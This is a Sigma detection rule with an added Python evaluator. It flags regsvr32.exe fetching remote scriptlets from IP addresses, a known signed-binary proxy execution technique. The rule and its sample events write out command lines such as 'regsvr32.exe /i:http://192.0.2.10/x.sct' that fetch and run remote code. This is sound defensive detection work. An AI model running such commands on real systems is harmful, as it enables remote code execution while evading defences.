Potentially Suspicious Regsvr32 HTTP IP Pattern

Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.

Sigma rule

title: Potentially Suspicious Regsvr32 HTTP IP Pattern
id: 2dd2c217-bf68-437a-b57c-fe9fd01d5de8
status: test
description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.
references:
    - https://twitter.com/mrd0x/status/1461041276514623491
    - https://twitter.com/tccontre18/status/1480950986650832903
    - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
author: Florian Roth (Nextron Systems)
date: 2022/01/11
modified: 2023/05/24
tags:
    - attack.defense_evasion
    - attack.t1218.010
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\regsvr32.exe'
        - OriginalFileName: 'REGSVR32.EXE'
    selection_ip:
        CommandLine|contains:
            - ' /i:http://1'
            - ' /i:http://2'
            - ' /i:http://3'
            - ' /i:http://4'
            - ' /i:http://5'
            - ' /i:http://6'
            - ' /i:http://7'
            - ' /i:http://8'
            - ' /i:http://9'
            - ' /i:https://1'
            - ' /i:https://2'
            - ' /i:https://3'
            - ' /i:https://4'
            - ' /i:https://5'
            - ' /i:https://6'
            - ' /i:https://7'
            - ' /i:https://8'
            - ' /i:https://9'
            - ' -i:http://1'
            - ' -i:http://2'
            - ' -i:http://3'
            - ' -i:http://4'
            - ' -i:http://5'
            - ' -i:http://6'
            - ' -i:http://7'
            - ' -i:http://8'
            - ' -i:http://9'
            - ' -i:https://1'
            - ' -i:https://2'
            - ' -i:https://3'
            - ' -i:https://4'
            - ' -i:https://5'
            - ' -i:https://6'
            - ' -i:https://7'
            - ' -i:https://8'
            - ' -i:https://9'
    condition: all of selection_*
falsepositives:
    - FQDNs that start with a number such as "7-Zip"
level: high
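To show how the two selections combine (list items inside selection_img are OR-ed, the condition AND-s both selections, and Sigma string modifiers match case-insensitively), here is an added Python evaluator run over constructed process_creation events; it is not part of the Sigma project, and the event field names, sample command lines and the 192.0.2.0/24 / 198.51.100.0/24 documentation addresses are assumptions. It also exercises the documented false positive, an FQDN that begins with a digit.

```python
from typing import Dict, List

# The rule's selections, transcribed from the YAML above.
IMG_ENDSWITH = "\\regsvr32.exe"
IMG_ORIGINALFILENAME = "REGSVR32.EXE"
# Expands to the same 36 substrings listed under selection_ip.
SELECTION_IP = [
    f" {flag}:{scheme}://{digit}"
    for flag in ("/i", "-i")
    for scheme in ("http", "https")
    for digit in "123456789"
]


def matches_selection_img(event: Dict[str, str]) -> bool:
    """selection_img is a list, so either item suffices (OR). Case-insensitive like Sigma."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    return image.endswith(IMG_ENDSWITH.lower()) or original == IMG_ORIGINALFILENAME.lower()


def matches_selection_ip(event: Dict[str, str]) -> bool:
    """CommandLine|contains with a list: any one substring matches (OR)."""
    cmd = event.get("CommandLine", "").lower()
    return any(pattern.lower() in cmd for pattern in SELECTION_IP)


def rule_matches(event: Dict[str, str]) -> bool:
    """condition: all of selection_* -> both selections must hold (AND)."""
    return matches_selection_img(event) and matches_selection_ip(event)


def evaluate(events: List[Dict[str, str]]) -> List[str]:
    """Return the ids of the events the rule would alert on."""
    return [e["id"] for e in events if rule_matches(e)]


# Constructed sample events (hypothetical paths and documentation-range IPs).
SAMPLE_EVENTS = [
    {"id": "ip-hit", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /i:http://192.0.2.10/x.sct"},
    # Renamed binary: Image no longer ends with regsvr32.exe, OriginalFileName still catches it.
    {"id": "ofn-hit", "Image": r"C:\Temp\r.exe", "OriginalFileName": "REGSVR32.EXE",
     "CommandLine": r"C:\Temp\r.exe -i:HTTPS://198.51.100.7/y.sct"},
    # The documented false positive: an FQDN starting with a digit also matches.
    {"id": "fqdn-fp", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /i:http://7-zip.example/z.sct"},
    {"id": "local", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\x.dll"},
    {"id": "fqdn-letters", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /i:http://example.com/a.sct"},
]
```

Running `evaluate(SAMPLE_EVENTS)` returns `["ip-hit", "ofn-hit", "fqdn-fp"]`; the third hit is exactly the class of false positive the rule's author lists, so tuning would need a host or domain allow-list rather than a change to the digit patterns.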
